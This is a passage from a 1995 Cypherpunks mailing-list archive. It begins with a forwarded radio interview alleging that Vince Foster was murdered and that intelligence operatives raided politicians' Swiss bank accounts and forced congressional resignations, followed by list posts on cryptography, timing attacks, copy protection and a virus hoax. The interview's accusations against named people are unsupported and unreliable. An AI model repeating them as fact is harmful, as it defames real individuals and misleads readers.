NORMAN: I can't say. QUINN: Patsy Thomason? NORMAN: No. I don't want to say. I suspect... QUINN: Dee Dee. Well, she's not there anymore. NORMAN: That name is known. I mean, she has been identified on these tapes apparently, but.... QUINN: I think Dee Dee and Bill are doing it, but that's just me. Anyway, let's get back to the story here. Okay, so I understand at least you are claiming that there is a videotape of Foster's murder? NORMAN: Well, of the people entering and leaving this apartment a few blocks from the White House where it apparently occurred. QUINN: Has anybody located this apartment? Do you know where it is? NORMAN: I don't know exactly where it is myself. I am told it is actually within a few blocks of the White House. QUINN: Okay, so they lure him here, and they pop him, and there is a videotape of it or there is a videotape of the people going in and out. Then, they go to Fort Marcy Park, and they dump him. NORMAN: Right. QUINN: Okay, and we've got a witness now that says they saw the two guys that fit the same description that Patrick Knowlton, the other witness, to Foster's car. He describes the one guy that threatens him. One of those people is one of the two that supposedly was walking Foster, who looked drunk to this guy, into the park, but he says that they laid him out. NORMAN: Yeah. I don't know too much about all that stuff, but what I know is this, that Paul Rodriguez is the Editor of Insight Magazine, that came up with this Mr. X source. When Forbes decided not to run the story for reasons that were kind of mysterious to me at the time, and while I was still there, they gave me permission to publish it elsewhere. And, as I approached Insight, because they are kind of a gutsy magazine, David Rodriguez made a whole bunch of calls around Washington trying to corroborate this stuff, and I think he was making some headway. Then, he gets this visit in person from some military intelligence guy from the Pentagon who comes to him and says, "Paul, lay off this story. You don't know what you're dealing with here." QUINN: No. I think we do know what we are dealing with here. We're dealing with the biggest scandal since maybe... NORMAN: And, you've got Israeli relations at stake here. You know, the intelligence community has a lot of joint ventures with the Israelis. They don't want to "queer" those things. I mean, we do business with those people a lot, and you know a lot of it is probably quite necessary, but you know there is a scandal here that dwarfs the Jonathan Pollard case by orders of magnitude really. QUINN: I want to discuss a couple of things with you. First of all, now it would appear that a bunch of Republicans picking Kenneth Starr to put him in charge of this investigation of Vince Foster and the Whitewater problem in Washington, D.C. On the surface, it looked like they were going for the jugular, but see, Mr. Starr has some background that leads back to the Inslaw case we discussed earlier in the show about the Promis software and stuff. He excused himself from that litigation. NORMAN: And, the reason was because he was the inside counsel for William French Smith at the Justice Department in 1982 at the time that the Inslaw software was expropriated by the government... QUINN: Okay. So he really is not in the position to be the pit bull to expose this. He is in a better position to get Clinton on whatever Republicans need to get him on and make sure that Republicans don't get burned here. NORMAN: I think that's it. Yeah. QUINN: Okay, now. Given that that's the case and given that the Washington inside-the-beltway crowd on both sides of the aisle are trying to make sure that the fix is in on this, how do you think or what leads you to believe that this is going to come out, and through what channels? NORMAN: Well, again, it goes back to resources of mine. Basically, there are a few good guys in the intelligence community, particularly this handful of people in the so-called Fifth Column, who are so incensed about this bipartisan coverup, the government's inability and unwillingness to deal with the high level corruption here, they've just decided to take things into their own hands. They never had government authorization to go raid the foreign bank accounts, but.... QUINN: How many accounts are there? How many people in the government right now have Swiss bank accounts filled with money from BCCI, drug laundering, defense kickbacks, arms trades, I mean all of this nonsense? NORMAN: Not as many as two years ago. These guys have been out raiding these accounts. They've pulled back $2.5 billion, more than $2.5 billion with a "B" dollars from 300, 400, 500 of these accounts. There is probably 3,000 coded Swiss and other foreign bank accounts that they have been rifling through the computers on. QUINN: How can there be this many of them and it doesn't come out? NORMAN: It is because it is endemic corruption. The government is corrupt. Why should we give the President of South Korea $600 million? ... country more powerful, more worth corrupting, more venal and with weaker controls for policing this stuff. QUINN: Well, because we don't believe it can happen here. NORMAN: That's right. We're Americans. Well, this is greed and money. But, there is.... QUINN: Well, it's murder too. NORMAN: That's right, and there have been hundreds of these accounts already raided, and nobody, NOBODY has been able to stand up and say, "I was robbed." Why? Because, the money came from exactly what you said -- kickbacks on drugs, kickbacks on arms, insider trading, and they never paid any taxes on this stuff. They've never disclosed it, and the minimum sentence for willful tax evasion is ten years, that's the minimum. So, what you have going on right now in Congress is basically, there is an Angel of Death. Actually, there are two I'm told. There is one on the Democratic side and one on the Republican side. QUINN: Now, do they make their rounds together? NORMAN: No. It's separately. What I'm told is that the people in Congress with these Swiss bank accounts, who have had these accounts, if they haven't already left, if they haven't had the good sense to already get their butts out of there, they have been delivered, hand delivered a brown paper envelope with transaction records of their Swiss bank accounts, and within a day or so they get a visit from this Angel of Death who says it's time for you to go, time to do some career planning, you're out of here, we don't want you in the government when the stuff hits the fan here, as it's gonna do in the spring apparently. The records are going to start coming out. It's going to be obvious. These vigilantes are just going to take this situation into their own hands and release this stuff, I'm convinced. QUINN: These people are real patriots. They could end up dead doing this. NORMAN: Some of them may already have. I think... but they've planned this quite well. I think they've got it down now. They know that if anything happens to them, that the stuff would just come out in a gush, so it would be counterproductive for.... QUINN: Yeah, but I mean is it going to come out in the mainstream media. You've got the Mena story being spiked a year ago by Katherine Graham at the Washington Post, and I've uncov... you, what I stumbled on a memo from Paul Keiser yesterday from the editor at the Washington Post who writes me in this memo a flat out blatant lie. He says that the authors of the Mena story, that was supposed to run January 26, 1995, in the Washington Post Outlook Section, had withdrawn the article before the Washington Post had decided to run it, and that's just a flat out lie. NORMAN: Well, it's technically probably true. But, what they've done, they've left those people dangling by a thread for like 6-8 months. I don't blame them for taking the story elsewhere as the.... QUINN: Yeah, but no, but Jim they didn't. The type galleys had been laid, and the artwork had been done. It was supposed... they didn't pull it until the Thursday before the Sunday it was supposed to run. NORMAN: Right. Well, technically the Post can say, "Oh, we never quieted you..." That's what they told me at Forbes, too, about my story. Finally, I never got a good reason why my story didn't run at Forbes. Ultimately, they said, "Oh, we didn't trust your sources." But, actually what my immediate supervisor said, "We can't say this about Systematics," which was a big advertiser at Forbes, and we can't say this about the Israelis. QUINN: Yeah, right. NORMAN: That's why didn't run in Forbes. QUINN: Well, there's actually no proof that Systematics has deliberately delivered stolen software. I mean, they may not even know that the software was stolen, and it may be another version of it. NORMAN: Systematics is under heavy duty investigation, though, right now for money laundering, because once you set up a system for laundering covert funds for the government, who knows what else you can piggyback on top of that. The suspicion is that this was the quid pro quo here in return for laundering, supposedly, call it legitimate funds that the intelligence community can piggyback other stuff to. QUINN: Let's get back to the Angel of Death here and the resignations in Congress, which have been pretty much attributed by guys like Rush Limbaugh to the fact that Democrats just don't like being in the minority anymore, and they don't have the guts or stamina to stick it out the way the Republicans did for 40 years. And, some of that may be true, but how many of these people who have said that they are pulling their hats out of the ring... And, now we have two Republicans... How many of these people have been visited by this so-called Angel of Death? All of them? NORMAN: Well, the figures I've heard is that I think there's like 25 or 26 so far since the last election who have decided they are not going to run again or had actually resigned and out of there, like Norman Minetta from Los Angeles[sic]. Of those, I'm told about 21 or 22 so far can be directly attributed to Swiss bank account problems. There is probably another dozen or so that are going to go that way. Again, there is an argument that, "Oh, we just can't stand the nasty politics in Washington anymore." Come on, give me a break. QUINN: Well, I like Patsy Schroeder. She wanted us to believe that now that the Democratic party is in such good shape she can leave it and it doesn't... did you see that? NORMAN: No.... QUINN: That was great. Oh yeah, now that.... NORMAN: Patsy Schroeder, somebody noted on the Internet that at the news conference where she was announcing she wasn't going to run, there had already been re-elect Schroeder bumper stickers printed up. I mean, she... take this guy Ron Coleman from Texas, a Congressman down there. He made his announcement at his supposed re-election campaign kickoff party. QUINN: You're kidding? This is right out of a... this is a movie. NORMAN: That's right. Listen, these people have been confronted. They've been given 24 hours basically to clean out their desks. That's what it amounts to. QUINN: So, they're gonna try and get all these people out who have Swiss bank accounts before it hits the fan. Now, when do you suppose that this is going to happen? Can you give us a timetable? NORMAN: Well, that's happening in tiers. I mean, we've already seen a bunch of departures. I think that the early spring is the timetable. You know, Wall Street is going to get hit with this stuff too. Now, every year in the spring, soon after the first of the year, after these guys collect their year-end bonuses, you have a big exodus. But, I'm told Wall Street is going to get hit with this big time this year because those guys were in it too. You gotta remember, there was so much money sloshing around here... QUINN: Yeah, really. NORMAN: ... from arms deals. You could not launder all of that money without the knowing, willing cooperation and participation of major banks, major brokerage houses, and... QUINN: Goldman Sachs possibly? NORMAN: Oh yeah. Look, Goldman... QUINN: I always found it strange that Robert Rubin showed up when he did. NORMAN: This Goldman, they were the chief investment bankers to Robert Maxwell in the U.K., helped Maxwell loot a half a billion dollars out of his pension funds, and it now costs a huge amount of money for a settlement there. QUINN: It sounds like somebody's calling you. NORMAN: They still have the bond for ADFA, the Arkansas Development... QUINN: Whoa, hold on a second. What's that? NORMAN: That's another one of these... QUINN: Well no, I know what it is. You're telling me that Goldman Sachs was holding the bonds for the Arkansas Development? NORMAN: No, they were the underwriter on a bunch of these $8 billion or so of bonds that ADFA marketed to who knows whom. QUINN: Oh man. You know, I have transactions on my desk at home, $80 million of money transfers to the Fuji Bank in the Cayman Islands from ADFA, the Arkansas Development Financial Authority, who I believe never had more than $8 million to begin with. I mean, where did they get $80 million, and what's it going to the Fuji Bank for? The interest rate? Come on, the Switzerland of the Caribbean. Jim, I gotta let you go. I gotta wrap this up here, but I want to thank you for joining us this morning. NORMAN: It's a pleasure. I'll keep you posted as more develops. There's going to be more coming down the pike here soon. QUINN: Well, I'll tell you what. I'm gonna call you later on today. I'll give you my home number. Let's stay in touch because if what you say is true and if there are truly some patriots in the intelligence community who are finally going to blow the whistle on this. By the way, all of these resignations and the Angel of Death and all of this, I think is evidence that these people know that this is inevitable that this is going to come out. NORMAN: It's like AIDS. I think there are a bunch of people back before the last election who realized they, in fact, have slept with the wrong woman or person, and they did not run again, but there has been denial, denial, denial by a bunch of these people. Finally, I think it's like the Angel of Death is finally coming around saying, "You gotta go. Bye. You're outta here." *************************** CREDITS****************************** If you are a talk show host and want to contact either one of these guys for an interview you can reach James Norman at MEDIA BYPASS MAGAZINE, 1-800-4-BYPASS Jim Quinn can be contacted at WRRK, 7 Parkway Center, Suite 780, Pittsburgh, PA 15220, Fax Number 412-928-9290, Internet address is quinn at sgi.net homepage at http://www.warroom.com or Compuserve 72662,3507. ======================================================================= Visit our Web site at http://www.the-spa.com/constitution/ If you need help setting up your own Web site, call us at 413/786-6802. ======================================================================= From stewarts at ix.netcom.com Tue Dec 12 13:29:44 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 13 Dec 1995 05:29:44 +0800 Subject: chaotic signal cryptography Message-ID: <199512122008.MAA09312@ix11.ix.netcom.com> At 08:00 PM 12/12/95 +0100, Anonymous wrote: >>A few years back i ran thru a paper emanating >>from a navy labs researcher (i think the name was Peccora) >>about using synchronised chaotic signal generators as a >>signal scrambling/encrytpion scheme. > >I too am interested in this technique. I may be wrong, but it seems like >a variation on the one-time pad. Any comments on this technique (usefulness, >robustness, etc.)? 1) It's not, repeat NOT, a one-time pad, or anything like one. Synchronised generators on both ends of a communication are yet another keyed algorithmic system, and are theoretically breakable; one-time pads are theoretically unbreakable (as long as you only use them once, prevent theft, etc.). Whether algorithmic systems are breakable in practice depends on how good the algorithms are, how good the keys are, how much attention is paid to cracking them, etc. 2) Almost everything I've heard about chaotic cryptosystems has said they're not very effective; it's too easy to predict the output. They're fine random number generators for simulations, but they're not cryptographically strong. 3) Maybe somebody's done something new and interesting in the field and hasn't told the general public about it, but if you heard about it a few years back it's been broken. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From perry at piermont.com Tue Dec 12 13:44:34 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 13 Dec 1995 05:44:34 +0800 Subject: Jim Quinn interview of James Norman (edited) In-Reply-To: <199512120247.SAA12705@nova.unix.portal.com> Message-ID: <199512121953.OAA03720@jekyll.piermont.com> According to the headers, you, Mr. Carp, forwarded this to Cypherpunks, when it was obviously available to those that wanted to read it on a variety of other mailing lists. Please don't continue doing this. Jon Roland writes: > The following is a Radio Interview between James Norman, > formerly Senior Editor of Forbes Magazine and now with Media > Bypass Magazine and Jim Quinn, DJ of WRRK 96.9 FM in Pittsburgh. > In this interview from December 7th, they discuss issues of > national importance and STUNNING IMPACT. Essentially they give > out the reason for Vincent Foster's Death, and the fact that > the "resignations" of the Congresspersons are NOT for policy > reasons but because they have been caught with millions in > corrupt funds in Swiss Banks. Read this to learn what the > "mainstream media" doesn't ever tell you... From ecarp at netcom.com Tue Dec 12 13:47:36 1995 From: ecarp at netcom.com (Ed Carp (ecarp@netcom.com)) Date: Wed, 13 Dec 1995 05:47:36 +0800 Subject: EXON Message-ID: <199512122017.OAA20584@khijol> > Date: Mon, 11 Dec 1995 23:10:25 -0800 (PST) > From: Rich Graves > To: Scott Binkley > Cc: High Society List > Subject: Re: EXON > On 11 Dec 1995, Scott Binkley wrote: > > > Could someone please explain to me what this "EXON" thing is?? > > A nucleic acid chain (RNA or DNA) is composed of exons, which are > "active" sequences of nucleotides that are expressed as polypeptides, and > "introns," what is known as "junk DNA." Only about 2% of the 6 billion or > so base pairs that make up the human genome are exons. > > (There is some controversy in molecular biology circles as to whether > "junk DNA" is really "junk" just because it doesn't build proteins. It > could perform a regulatory or "frame-check" function.) Actually, I think that once the matter is further studied, scientists will discover that the "junk DNA" is not junk, but inactive DNA, waiting for a "trigger". From holovacs at styx.ios.com Tue Dec 12 13:49:29 1995 From: holovacs at styx.ios.com (Jay Holovacs) Date: Wed, 13 Dec 1995 05:49:29 +0800 Subject: F. Y. I. In-Reply-To: <9511128188.AA818815409@603cs.croughton.af.mil> Message-ID: Good times is an old hoax. ignore it AOLGOLD referenced by another poster is real but kind of dumb. Jay Holovacs PGP Key fingerprint = AC 29 C8 7A E4 2D 07 27 AE CA 99 4A F6 59 87 90 From SBinkley at atitech.ca Tue Dec 12 13:53:42 1995 From: SBinkley at atitech.ca (Scott Binkley) Date: Wed, 13 Dec 1995 05:53:42 +0800 Subject: EXON In-Reply-To: Message-ID: Could someone please explain to me what this "EXON" thing is?? From SBinkley at atitech.ca Tue Dec 12 13:53:54 1995 From: SBinkley at atitech.ca (Scott Binkley) Date: Wed, 13 Dec 1995 05:53:54 +0800 Subject: Pornographic stories In-Reply-To: <8043943A02502C79@-SMF-> Message-ID: <8143943A01502C79@-SMF-> Stop posting this type of crap on the Internet. People like you are the ones to get everyone censored. Hopefully everyone else will flame you a thousand times over From perry at piermont.com Tue Dec 12 13:53:55 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 13 Dec 1995 05:53:55 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512111906.OAA01139@crypto.com> Message-ID: <199512111944.OAA02490@jekyll.piermont.com> Matt Blaze writes: > >The trivial way to handle this is simply to check user time with the > >right system calls and make sure it always comes out the same with an > >apropriate number of sleeps. > > Of course, this works against a remote adversary, but not against one > on the same machine who can look at actual CPU consumption (which doesn't > increase when the target is blocked). True enough, but using busy loops could handle that. However, I must admit to being far more interested in handling the remote case efficiently, especially given concerns people have about using Photuris like systems on heavily pounded servers. Perry From turner at TeleCheck.com Tue Dec 12 13:53:57 1995 From: turner at TeleCheck.com (turner at TeleCheck.com) Date: Wed, 13 Dec 1995 05:53:57 +0800 Subject: [NOISE] anti-copy In-Reply-To: <199512110852.DAA15235@opine.cs.umass.edu> Message-ID: <9512112112.AA03120@mercury.telecheck.com> futplex at pseudonym.com said: >> Daark writes: How would it be possible to create files that KNOW they >> are a copy? > It's not, to the great dismay of the Software Publishers Association > (or whatever they're called). Not to pick nits, but I was deeply into cracking^h^h^hbacking up software in the 80's, when I got my first Apple II complete with 4K of RAM. There are several schemes of copy protection that were used, like strange sector/track interleaving, and burning the floppies with lasers to render certain sectors unreadable/writable. The program would attempt to read that area of the disk, and if it couldn't it was on the original media. Of course, this was in the days before 20MB MFM drives became the rage, when Woz was king. I guess the only way for a program to know if it was a copy would be to have itself figure out what track/sector it is on and inject and/or compare that information into the executable. But since this information is no longer easy to come by as operating systems become more protected, this wouldn't be viable. Especially if you take into account that disks go bad, and backups are needed. More importantly, it would be very easy to hunt down and replace with NOPs. More so than taking out the dreaded, "enter the phrase on line 3 on page 25 on your manual..." To summarize, its possible (under _some_ operating systems), but it is not a good solution to the problem. From jim at acm.org Tue Dec 12 13:54:04 1995 From: jim at acm.org (Jim Gillogly) Date: Wed, 13 Dec 1995 05:54:04 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <0kn1kjCMc50e02ivZP@nsb.fv.com> Message-ID: <199512111920.LAA24338@mycroft.rand.org> > Nathaniel Borenstein writes: > Hey, don't go for constant time, that's too hard to get perfect. Add a > *random* delay. This particular crypto-flaw is pretty easy to fix. > (See, I'm not *always* arguing the downside of cryptography!) Random delay may be harder to get perfect than constant time. Note that the actual time for the transaction is the minimum of all the transaction times you measure, since you can't add a negative delay to them. It's presumably even easier if the random distribution is known. Adding a random delay means more transactions are required to find each new bit, but information is still leaking. > It is worth noting, however, the extent to which "secure" cryptographic > protocols keep needing to get fixed one last time.... -- Nathaniel Amen... Jim Gillogly Trewesday, 21 Foreyule S.R. 1995, 19:16 From mab at crypto.com Tue Dec 12 13:54:04 1995 From: mab at crypto.com (Matt Blaze) Date: Wed, 13 Dec 1995 05:54:04 +0800 Subject: Timing Attacks In-Reply-To: Message-ID: <199512112011.PAA01501@crypto.com> >I'm not so sure I see the great usefulness of this attack. > >I've taken a cursory glance at Mr. Kocher's paper on-line and what it >comes down to essentially, if I undestand it correctly, is that you need >to be as sure of the timing as you can be. > >Now, on a distributed system, you can't measure those timings, because >any latency could come from the originating computer, the links in the >middle or any combination of them. > >Also precise timings can be limited by fluctuating load averages amongst >other things in a time-sharing computing environment. While this might >work in a lab, with the current advances in computing speed, the >differences between a fast and a slow calculation can easily be opaqued >by network lag. > >Am I missing something, or does this attack only work in a lab? > The more timing noise between the attacker and the target, the harder it is to exploit the measurements. Based on some (very rough) experiments I've set up here, I suspect the attack is easy if you're on the same computer (and measure CPU load), probably feasible if you're on the same network and the host and net are unloaded, and unlikely otherwise. The attack is especially interesting against crypto tokens that are supposed to hold a secret key secret, where you can get very close and take very good timing measurements. Keep in mind also that Kocher's results are only the first cut, based on a very simple statistical model. I suspect we'll be seeing many improvements and variations over the coming months. Bottom line is that implementing good cryptosystems is a lot harder than one might think... -matt From futplex at pseudonym.com Tue Dec 12 13:54:07 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 13 Dec 1995 05:54:07 +0800 Subject: The Elevator Problem In-Reply-To: <9512111557.AA09207@envirolink.org> Message-ID: <199512112229.RAA27787@thor.cs.umass.edu> Munster writes: > Ok, here was the method of key generation i was talking about. With the light > communications, the idea was to use photons whose waves pulsed in certain > directions (up/down, left/right, and diagonally) to create a way toommunicate > much like morse code. Right, this is the main quantum crypto idea of Brassard et al. (See for example _Applied Crypto_ v.1 pp.408-410) [...] > but since the contents of the key were never > touched on DIRECTLY, no eavesdfropper could determine the key, No, the integrity of the system really depends upon the quantum properties of light. Among other things, Heisenberg's Uncertainty Principle makes it impossible for Eve to "eavesdrop" on the photons without affecting them measurably. [...] > however, if one wwas to use the orientation symbols in ones > messages, as if they were being beamed, but in an email message instead, one > could make use of the simple key, and the simple game of '20 questions' to > generate a totally secure key [...] In this situation Eve can read the email traffic without modifying it, so the game is up. -Futplex From llurch at networking.stanford.edu Tue Dec 12 13:54:07 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Wed, 13 Dec 1995 05:54:07 +0800 Subject: EXON In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On 11 Dec 1995, Scott Binkley wrote: > Could someone please explain to me what this "EXON" thing is?? A nucleic acid chain (RNA or DNA) is composed of exons, which are "active" sequences of nucleotides that are expressed as polypeptides, and "introns," what is known as "junk DNA." Only about 2% of the 6 billion or so base pairs that make up the human genome are exons. (There is some controversy in molecular biology circles as to whether "junk DNA" is really "junk" just because it doesn't build proteins. It could perform a regulatory or "frame-check" function.) In cryptographic applications, the sequence of nucleotides can only be considered random inasmuch as the ratio of exon to intron is unknown. Hence the inside joke. You see? There is also a United States Senator James Exon, D-Nebraska I believe, who has introduced several restrictive and silly pieces of legistlation concerning online privacy rights. "The Exon Bill" claims to hold individuals and online service providers liable for the transmission of undefined "inappropriate" material, such as pornography. So maybe that's what you've heard people talking about. Information on Senator Exon is available at all the usual online freedom and privacy haunts: eff.org cdt.org epic.org aclu.org - -rich -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMM0qn43DXUbM57SdAQFcQAQAwfRfYqWQN2EMfj2Rzd3IkJah4O87I9/X bkmpe35NL0EC2t2BqNcUbQeQ8BST2pnqrtGU8oeqBJFqLejicK+0gbUGTD3Lj2sJ i3/B41R9LMAOhwgRVAteO0YgDB+taVBo4Fuu5D1fOhZX9JDNjqq/LMTJ/r+AnPi6 jEwSwvOnvAk= =rpMA -----END PGP SIGNATURE----- From baldwin at RSA.COM Tue Dec 12 14:04:14 1995 From: baldwin at RSA.COM (baldwin (Robert W. Baldwin)) Date: Wed, 13 Dec 1995 06:04:14 +0800 Subject: Wanted: email for Calif senators & representatives Message-ID: <9511128188.AA818800342@snail.rsa.com> Can someone send me, or the list, the email addresses for the California senators and representatives? --Bob Baldwin From markm at omni.voicenet.com Tue Dec 12 14:05:04 1995 From: markm at omni.voicenet.com (Mark M.) Date: Wed, 13 Dec 1995 06:05:04 +0800 Subject: In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On 11 Dec 1995, Scott Binkley wrote: > A long time ago, I read about a program that would take a picture, and > replace the LSB of every pixel > in the picture with your message. I'm wondering, Is the source code for > this program availible anywhere > on the net??? > > The program is at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/steganography/jsteg/. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMM3uxbZc+sv5siulAQGL+QP9FDfd7ftarbT0znpmefH52KP9fUmSbomr QhTTnTwAbzul6F1RGFomSMfpev5BD6+WaaoGuLarbLP6sSeeGpHNWSVBMfsBiay1 7yz0P5p8w6nv62E/3jG3SPtdzehk5x1yij1wzDibXHcI3NKtkwatofLzuMwigs0R HRzRWxwQPsE= =PBrg -----END PGP SIGNATURE----- finger markm at voicenet.com for Public Key http://www.voicenet.com/~markm/ Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5 -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+ b+++ DI+ D++ G+++ e! h* r! y? ------END GEEK CODE BLOCK------ From samman-ben at CS.YALE.EDU Tue Dec 12 14:12:22 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Wed, 13 Dec 1995 06:12:22 +0800 Subject: EXON [Noise] In-Reply-To: <199512122017.OAA20584@khijol> Message-ID: > > (There is some controversy in molecular biology circles as to whether > > "junk DNA" is really "junk" just because it doesn't build proteins. It > > could perform a regulatory or "frame-check" function.) > > Actually, I think that once the matter is further studied, scientists > will discover that the "junk DNA" is not junk, but inactive DNA, > waiting for a "trigger". Sorta like that episode of Star Trek where all this DNA gets combined into a 3-D Quicktime movie? Ben. ____ Ben Samman..............................................samman at cs.yale.edu "If what Proust says is true, that happiness is the absence of fever, then I will never know happiness. For I am possessed by a fever for knowledge, experience, and creation." -Anais Nin PGP Encrypted Mail Welcomed Finger samman at powered.cs.yale.edu for key From futplex at pseudonym.com Tue Dec 12 14:44:09 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 13 Dec 1995 06:44:09 +0800 Subject: GAK and self-incrimination? In-Reply-To: <199512102233.AA10816@ideath.goldenbear.com> Message-ID: <199512110944.EAA14913@opine.cs.umass.edu> Greg Broiles writes: > But it seems to me that the real bottom line is that the information which > is compelled is not incriminating, and the information which is > incriminating is not compelled. The keys to my crypto might lead to > incriminating evidence, or they might prove to be useful in a prosecution, > but they're not in themselves any sort of a signal that a crime has been or > will be committed. Written half in jest: Well, the cries from the TLAs of "Why do you want to use cryptography ? What do you have to hide ?" notwithstanding.... -Futplex From wjhalv1 at PacBell.COM Tue Dec 12 14:55:49 1995 From: wjhalv1 at PacBell.COM (William J. Halverson) Date: Wed, 13 Dec 1995 06:55:49 +0800 Subject: F. Y. I. Message-ID: If the >>>>>>>computer contains a hard drive, that will most likely be >>>>>>>destroyed. If the program is not stopped, the computer's >>>>>>>processor will be placed in an nth-complexity infinite binary >>>>>>>loop -which can severely damage the processor if left running >>>>>>>that way too long. Hmmmm ... so now we see that using CPUs 'too much' will damage the processor ... Hmmm ... I guess it runs out of oil??? Heh heh heh ... ---------------------------------------------------------------- Bill Halverson Pacific Bell Sent 12:45:46 PDT on 12/12/95 PH 415 542 6564 wjhalv1 at pacbell.com FAX 415 542 4744 "The views of the author are not those of his employer ... yet." From ncognito at gate.net Tue Dec 12 17:51:33 1995 From: ncognito at gate.net (Ben Holiday) Date: Wed, 13 Dec 1995 09:51:33 +0800 Subject: IDEA encryption Message-ID: The copy of the source for idea (unix) that I have specify's a user key length of 8 bytes, but allows this to be increased to something larger. Will increasing the user keylength improve the overall security? Also, is it worth hashing the user key first, then using the hashed key as the key for encryption and decryption? Or am I wasting my time? Last thing -- how secure is unix "rm"? If something is rm'd, is it really really gone? Thnks.. From jadestar at netcom.com Tue Dec 12 18:20:22 1995 From: jadestar at netcom.com (JaDe) Date: Wed, 13 Dec 1995 10:20:22 +0800 Subject: F. Y. I. In-Reply-To: <9511128188.AA818815409@603cs.croughton.af.mil> Message-ID: <199512130009.QAA16527@netcom.netcom.com> > > To all. This is something I received from a fellow Internet user in > the States. I don't know where he got this info, but I thought we may > all benefit from this warning. > > SrA Lounsbury sends... > > >>>>>>SUBJECT: VIRUSES--IMPORTANT PLEASE READ IMMEDIATELY > >>>>>>line "Good Times", DO NOT read the message, DELETE it I've been employed by two of the largest and most well-known Anti-Virus software companies in the world (Symantec and now McAfee). I've supported a wide variety of anti-virus products. I can assure you that this is a hoax. There is currently no known mechanism by which an e-mail message could "infect" and "propagate" independent of OS and MUA. In other words it would require a specific combination of operating system and platform and/or a specific mail reading program to transparently execute code (macros whatever) inside of a mail message. Java, LiveScript, and Microsoft's transparent MSN hooks could allow these sorts of things in the future (through suitably *bad* client software. Also I've heard that the e-mail package included with WordPerfect Office can execute some binary attachments, automatically. Other than those two exceptions I know of know way that this would be feasible. On comp.virus (or was it alt.comp.virus??) there was considerable (and heated) debate about the feasibility (and possible *desirability ) of a trojan horse that would be specific to a client (like AOL's proprietary access software) and would pipe in some data to exploit some as yet undiscovered bug (like the famous fingerd buffer overflow) to force execution of CPU specific machine code. In any event these would not be "viruses" in the traditional computer sense of the term. Virus researchers naturally have to distinguish between worms, logic bombs, trojan horses, droppers, and various types of virus. There is considerable literature on these distinctions (which I have neither the time nor the expertise to attempt to duplicate here). (and there was much rejoicing). All of this has little to do with cryptography. The cryptography used in computer viruses is generally not very sophisticated. the primary constraints are compactness of algorithm and convenience of the implementation with respect to a given processor. The only purpose is to obuscate the code -- try to limit the efficiency or effectiveness of signature based scanning engines. Mostly they use self-modifying code loops with XOR's and simple ADD's and SUB's. I heard of one that PUSHed all it's code onto the stack and then did a simple FAR JMP to it (apparently quite compact). Finally I'd like to recommend that people please restrain themselves from forwarding press releases from various sources to other mailing lists that "might be interested." Most of us are big boys and girls. If our interest is sufficiently broad, we'll go subscribe to those other lists or newsgroups. If you insist on referring to things from other sources -- perhaps a short query (like "Say does anyone here think the 'Good Times' virus has anything to do with with cryptography?" and "Well, if your interested you can find out more about it on foo -- or ask and I'll forward a copy") will be more conservative of our time and bandwidth. (Now y'all can flame me for wasting this much on a largely off-topic response -- but please feel free to direct those flames to /dev/null or to *just me*). From DMiskell at envirolink.org Tue Dec 12 18:26:50 1995 From: DMiskell at envirolink.org (Daniel Miskell) Date: Wed, 13 Dec 1995 10:26:50 +0800 Subject: Pornographic stories Message-ID: <9512122251.AA03113@envirolink.org> A&SUser writes: >Hey, I'm Molly, and I know I sent you a bit of mail a couple of days ago. > I'm not sure how you do your Pornographic server, so I'll just ask >again. I know I would be VERY gratful if you could send me any XXX >stories, I love to read them. I could reward you over the net somehow >I'm sure. >my adress is mphillips at cctr.umkc.edu > >Thanks....I'll be waiting. > What the hell are you talking about?? This is the cypherpunks mailing list!! Jeses, try alt.sex.stories. :P Munster --- _________________________________ *!Cheese Doctrine:!* Though cultured over time, and aged to perfection, one must not yield to produce mold. One must also not belittle themselves by conforming to the "whiz", but melt over the unprocessed ideas of Ghuda. _________________________________ From scs at lokkur.dexter.mi.us Tue Dec 12 18:29:06 1995 From: scs at lokkur.dexter.mi.us (Steve Simmons) Date: Wed, 13 Dec 1995 10:29:06 +0800 Subject: Wanted: email for Calif senators & representatives In-Reply-To: <9511128188.AA818800342@snail.rsa.com> Message-ID: <4akv20$965@lokkur.dexter.mi.us> "baldwin" writes: > Can someone send me, or the list, the email addresses for >the California senators and representatives? You can access the entire house through http://www.house.gov/Welcome.html. http://policy.net/ has a number of good references to legislators; you may be able to find your senator through it. -- "I tracked down why mail to you wasn't getting thru. When it comes to getting someone to fix something, often it's not what you know, or who you know, but who you just might embarass in front of their customers. It's now fixed." -- me, in email to a friend From aba at atlas.ex.ac.uk Tue Dec 12 18:33:50 1995 From: aba at atlas.ex.ac.uk (aba at atlas.ex.ac.uk) Date: Wed, 13 Dec 1995 10:33:50 +0800 Subject: BIO-MUNITION: gifs of perl-RSA tattoo Message-ID: <730.9512122013@exe.dcs.exeter.ac.uk> People have been reading the list for a while will be familiar with this piece of perl code used as a non-exportable, supposedly ITAR controlled .sig: #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa 2/d0 had his wife (who is a tattoo artist) put a tatto of this code on his forearm. Gif of the Richard's tattoo now available here: http://www.dcs.ex.ac.uk/~aba/rsa/tattoo.html This means that he may, technically, qualify as a munitions on 